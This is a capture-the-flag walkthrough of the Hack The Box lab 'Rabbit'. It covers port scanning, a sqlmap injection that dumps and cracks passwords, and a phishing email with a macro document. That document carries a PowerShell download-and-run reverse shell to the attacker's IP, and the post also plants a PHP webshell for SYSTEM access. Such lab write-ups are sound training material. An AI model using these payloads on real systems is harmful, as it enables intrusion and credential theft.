HTB – Rabbit

Today we are going to solve another CTF challenge “Rabbit” which is categories as retired lab presented by Hack the Box for making online penetration practices.

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Rabbit is is 10.10.10.71 so let’s start with  a basic nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.71
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-13 15:54 W. Europe Summer Time
Nmap scan report for 10.10.10.71
Host is up (0.032s latency).
Not shown: 976 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.20], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:36+00:00; +5h00m01s from scanner time.
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-13 18:55:06Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:33+00:00; +5h00m01s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
587/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.20], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:34+00:00; +5h00m01s from scanner time.
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
808/tcp open ccproxy-http?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3306/tcp open mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6003/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
Service Info: Hosts: Rabbit.htb.local, RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

Host script results:
|_clock-skew: mean: 5h00m01s, deviation: 0s, median: 5h00m00s
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.84 seconds
Let’s enumerate the web server with Gobuster:
root@kali:~/htb/rabbit# gobuster -e -k -u http://10.10.10.71:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.71:8080/
[+] Threads : 20
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Expanded : true
[+] Timeout : 10s
=====================================================
2019/05/13 10:30:07 Starting gobuster
=====================================================
http://10.10.10.71:8080/index (Status: 200)
http://10.10.10.71:8080/Index (Status: 200)
http://10.10.10.71:8080/favicon (Status: 200)
http://10.10.10.71:8080/%!(NOVERB) (Status: 403)
http://10.10.10.71:8080/INDEX (Status: 200)
http://10.10.10.71:8080/joomla (Status: 301)
http://10.10.10.71:8080/*checkout* (Status: 403)
http://10.10.10.71:8080/complain (Status: 301)

We found a Complain Management System



root@kali:~/htb/rabbit# searchsploit 'complain management system'
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Complain Management System - Hard-Coded Credentials / Blind SQL injection | exploits/php/webapps/42968.txt
Complain Management System - SQL injection | exploits/php/webapps/41131.txt
root@kali:~/htb/rabbit# cat /usr/share/exploitdb/exploits/php/webapps/42968.txt 
# Exploit Title : Complain Management System Blind SQL Injection
# Date: 10 October 2017
# Exploit Author: havysec 
# Tested on: ubuntu14.04
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files


## About The Product :
Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.

## Vulnerability :
The functions.php file line 88 has hardcoded admin credentials.
elseif($uType == 'admin'){
//$_SESSION['user_id'] = $row['sid'];
if($userName == 'admin' && $password == 'admin123'){
$_SESSION['user_id'] = 0;
$_SESSION['user_name'] = 'Administrator';
$_SESSION['user_type'] = 'admin';
header('Location: '.WEB_ROOT.'index.php');
exit;

Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.

As we read, the first thing will be to register as ‘ Customer ‘ and with the cookie PHPSESSID + sqlmap get access to the databases.

.

c:\SQLMAP>type rabbit.req
POST /complain/process.php?action=assignComplain HTTP/1.1
Host: 10.10.10.71:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.71:8080/complain/view.php?mod=admin&view=viewByCompID&compId=10
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Connection: close
Cookie: PHPSESSID=82k6csju4c0ccdepcbnan5k602
Upgrade-Insecure-Requests: 1

compId=10&compDesc=&engId=6&btnLogin=+Assing+Complain+
c:\SQLMAP>
c:\SQLMAP>python sqlmap.py -r rabbit.req --dbms=mysql -p "compId" --risk=3 --level=3 --batch -D secret --dump
___
__H__
___ ___[(]_____ ___ ___ {1.2.11.19#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:16:49 /2019-05-15/

[15:16:49] [INFO] parsing HTTP request from 'rabbit.req'
[15:16:49] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://10.10.10.71:8080/complain/view.php?mod=admin&view=compDetails'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[15:16:50] [INFO] heuristics detected web page charset 'ISO-8859-2'
[15:16:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:16:50] [INFO] testing if the target URL content is stable
[15:16:51] [INFO] heuristic (basic) test shows that POST parameter 'compId' might be injectable (possible DBMS: 'MySQL')
[15:16:51] [INFO] testing for SQL injection on POST parameter 'compId'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] Y
--snip--
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[15:18:21] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'c:\SQLMAP\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[15:18:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[15:18:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[15:18:21] [INFO] starting 4 processes
[15:18:2515:18:25] [] [INFOINFO] cracked password '] current status: 15091... /barcelona' for user 'Malek'
[15:18:31] [INFO] cracked password 'popcorn' for user 'Dumah'
[15:18:32] [INFO] cracked password 'santiago' for user 'Moebius'
[15:18:56] [INFO] cracked password 'pussycatdolls' for user 'Ariel'
Database: secret
Table: users
[10 entries]
+----------+--------------------------------------------------+
| Username | Password |
+----------+--------------------------------------------------+
| Zephon | 13fa8abd10eed98d89fd6fc678afaf94 |
| Kain | 33903fbcc0b1046a09edfaa0a65e8f8c |
| Dumah | 33da7a40473c1637f1a2e142f4925194 (popcorn) |
| Magnus | 370fc3559c9f0bff80543f2e1151c537 |
| Raziel | 719da165a626b4cf23b626896c213b84 |
| Moebius | a6f30815a43f38ec6de95b9a9d74da37 (santiago) |
| Ariel | b9c2538d92362e0e18e52d0ee9ca0c6f (pussycatdolls) |
| Turel | d322dc36451587ea2994c84c9d9717a1 |
| Dimitri | d459f76a5eeeed0eca8ab4476c144ac4 |
| Malek | dea56e47f1c62c30b83b70eb281a6c39 (barcelona) |
+----------+--------------------------------------------------+

[15:19:04] [INFO] table 'secret.users' dumped to CSV file 'C:\Users\jacco\.sqlmap\output\10.10.10.71\dump\secret\users.csv'
[15:19:04] [INFO] fetched data logged to text files under 'C:\Users\jacco\.sqlmap\output\10.10.10.71'

[*] ending @ 15:19:04 /2019-05-15/

Exploitation

Where do we use these obtained credentials now? Let’s try in
https://10.10.10.71/owa

We use found  valid credentials:

Ariel:pussycatdolls

Once we have entered to the /owa the first thing will be to check the mails:

As we read in these emails, we could use a malicious Open Office to get shell but considering the PowerShell constraint and the Windows Defender
In metasploit there’s an exploit that could work:

exploit/multi/misc/openoffice_document_macro

We rename the file obtained to zip and edit the file replacing the payload by:

powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd
Because of the PowerShell constraint we must use the -version 2 option:
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd

Send an email to all, containing our malicious .odt file:

Two years later, the answer to resolving headaches with attachments in Outlook Web Access (OWA) remains unchanged: Use Internet Explorer, not Edge, not Chrome, not Firefox.

And now we wait for it to be executed by an user. (This will take appprox 7 minutes, if it doesn’t after 10 reset the box.

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 -
C:\Users\jacco>nc -lvp 1234
listening on [any] 1234 ...
10.10.10.71: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.71] 20231: NO_DATA
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\OpenOffice 4\program>whoami
whoami
htb\raziel

c:\Users\Raziel\Desktop>type user.txt
type user.txt
c6f*****e9c

Post-Exploitation

c:\>dir wamp64
dir wamp64
Volume in drive C has no label.
Volume Serial Number is AEA8-5415

Directory of c:\wamp64

10/28/2017 11:13 AM <DIR> .
10/28/2017 11:13 AM <DIR> ..
10/28/2017 12:19 PM <DIR> alias
10/28/2017 11:13 AM <DIR> apps
12/31/2010 09:39 AM 4,790 barimage.bmp
10/28/2017 11:15 AM <DIR> bin
10/28/2017 11:13 AM <DIR> cgi-bin
01/08/2017 10:13 AM 28,470 images_off.bmp
01/08/2017 10:13 AM 28,470 images_on.bmp
09/01/2017 04:30 PM 3,978 install-english.txt
10/28/2017 11:13 AM <DIR> lang
11/06/2015 11:00 AM 8,156 license-english.txt
10/28/2017 11:18 AM <DIR> logs
09/01/2017 09:44 AM 5,741 mariadb_support_en.txt
09/01/2017 04:20 PM 1,289 read_after_install-english.txt
10/28/2017 11:13 AM <DIR> scripts
05/13/2019 12:44 PM <DIR> tmp
10/28/2017 11:16 AM 4,038,372 unins000.dat
10/28/2017 11:13 AM 1,401,105 unins000.exe
10/28/2017 11:13 AM 185 uninstall_services.bat
10/29/2017 10:32 PM 2,086 wampmanager.conf
09/03/2008 03:46 PM 1,233,408 wampmanager.exe
11/16/2017 07:57 PM 546,316 wampmanager.ini
08/30/2017 09:28 AM 29,431 wampmanager.tpl
05/13/2019 01:56 PM <DIR> www
14 File(s) 7,331,797 bytes
11 Dir(s) 25,699,479,552 bytes free

c:\>

We see that the Web service of port 8080 is served by Wamp64. Sometimes this service is run as system.
Let’s see if we have write permissions and who’s running it:

c:\>cacls wamp64
cacls wamp64
c:\wamp64 NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_APPEND_DATA

BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA

CREATOR OWNER:(OI)(CI)(IO)(ID)F

c:\>

Let’s upload a php webshell:

c:\Python37>type puckie.php
  <?php echo shell_exec($_GET["cmd"]); ?>
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 -
10.10.10.71 - - [13/May/2019 14:57:26] "GET /puckie.php HTTP/1.1" 200 -
c:\Users\Raziel\Desktop>certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
**** Online ****
0000 ...
002c
CertUtil: -URLCache command completed successfully.
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=whoami
  nt authority\system
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=type%20c:\users\administrator\desktop\root.txt
0b2*****d54

Now we can read the flag and even get shell as System easily.

Author: Jacco Straathof

Reference used : https://ironhackers.es/en/writeups/writeup-rabbit-hackthebox/

Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *